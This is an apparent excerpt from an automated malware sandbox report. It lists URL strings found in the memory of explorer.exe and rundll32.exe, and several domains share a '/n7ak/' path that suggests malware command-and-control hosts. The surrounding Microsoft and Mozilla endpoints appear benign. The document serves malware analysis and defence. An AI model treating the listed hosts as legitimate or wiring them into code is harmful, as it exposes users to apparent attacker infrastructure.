          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.goodstuff.tvReferer:
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3767349991.0000000010E79000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3752820809.0000000004B39000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.jam-nins.com
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3767349991.0000000010E79000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3752820809.0000000004B39000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.jam-nins.com/n7ak/
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jam-nins.com/n7ak/www.sdnaqianchuan.com
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jam-nins.comReferer:
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maximsboutique.com
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maximsboutique.com/n7ak/
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maximsboutique.com/n7ak/www.tuktukwines.com
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maximsboutique.comReferer:
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.parkpeninsula.online
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.parkpeninsula.online/n7ak/
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.parkpeninsula.online/n7ak/www.395boulderbrookdr.com
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.parkpeninsula.onlineReferer:
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.playdoapp.online
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.playdoapp.online/n7ak/
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.playdoapp.online/n7ak/www.taxuw.com
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.playdoapp.onlineReferer:
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sdnaqianchuan.com
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sdnaqianchuan.com/n7ak/
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sdnaqianchuan.com/n7ak/www.parkpeninsula.online
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sdnaqianchuan.comReferer:
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.supremeajock.biz
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.supremeajock.biz/n7ak/
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.supremeajock.biz/n7ak/www.1690.biz
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.supremeajock.bizReferer:
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.taxuw.com
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.taxuw.com/n7ak/
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.taxuw.com/n7ak/www.jam-nins.com
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.taxuw.comReferer:
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thehandycrewcompany.com
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thehandycrewcompany.com/n7ak/
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thehandycrewcompany.com/n7ak/www.tripskorea.com
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thehandycrewcompany.comReferer:
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tripskorea.com
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tripskorea.com/n7ak/
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tripskorea.com/n7ak/www.gameofgem.com
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tripskorea.comReferer:
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tuktukwines.com
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tuktukwines.com/n7ak/
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tuktukwines.com/n7ak/www.playdoapp.online
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tuktukwines.comReferer:
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.volkovastyu.com
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.volkovastyu.com/n7ak/
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.volkovastyu.com/n7ak/www.goodstuff.tv
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.volkovastyu.comReferer:
          Source: explorer.exe, 00000008.00000003.3081808656.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3757784608.0000000008F83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
          Source: explorer.exe, 00000008.00000000.1323539837.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000008.00000003.3081808656.0000000008DAD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000008.00000002.3757784608.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081808656.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000008.00000002.3754644999.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1317815671.0000000007276000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
          Source: explorer.exe, 00000008.00000002.3757784608.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081808656.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
          Source: explorer.exe, 00000008.00000002.3757784608.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081808656.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/repX
          Source: explorer.exe, 00000008.00000000.1337456269.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3762420609.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
          Source: rundll32.exe, 0000000A.00000002.3749703001.0000000000811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: rundll32.exe, 0000000A.00000002.3749703001.0000000000811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: rundll32.exe, 0000000A.00000002.3749703001.0000000000811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: rundll32.exe, 0000000A.00000002.3749703001.0000000000811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
          Source: rundll32.exe, 0000000A.00000002.3749703001.0000000000811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: rundll32.exe, 0000000A.00000002.3749703001.0000000000811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: rundll32.exe, 0000000A.00000003.1398319849.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
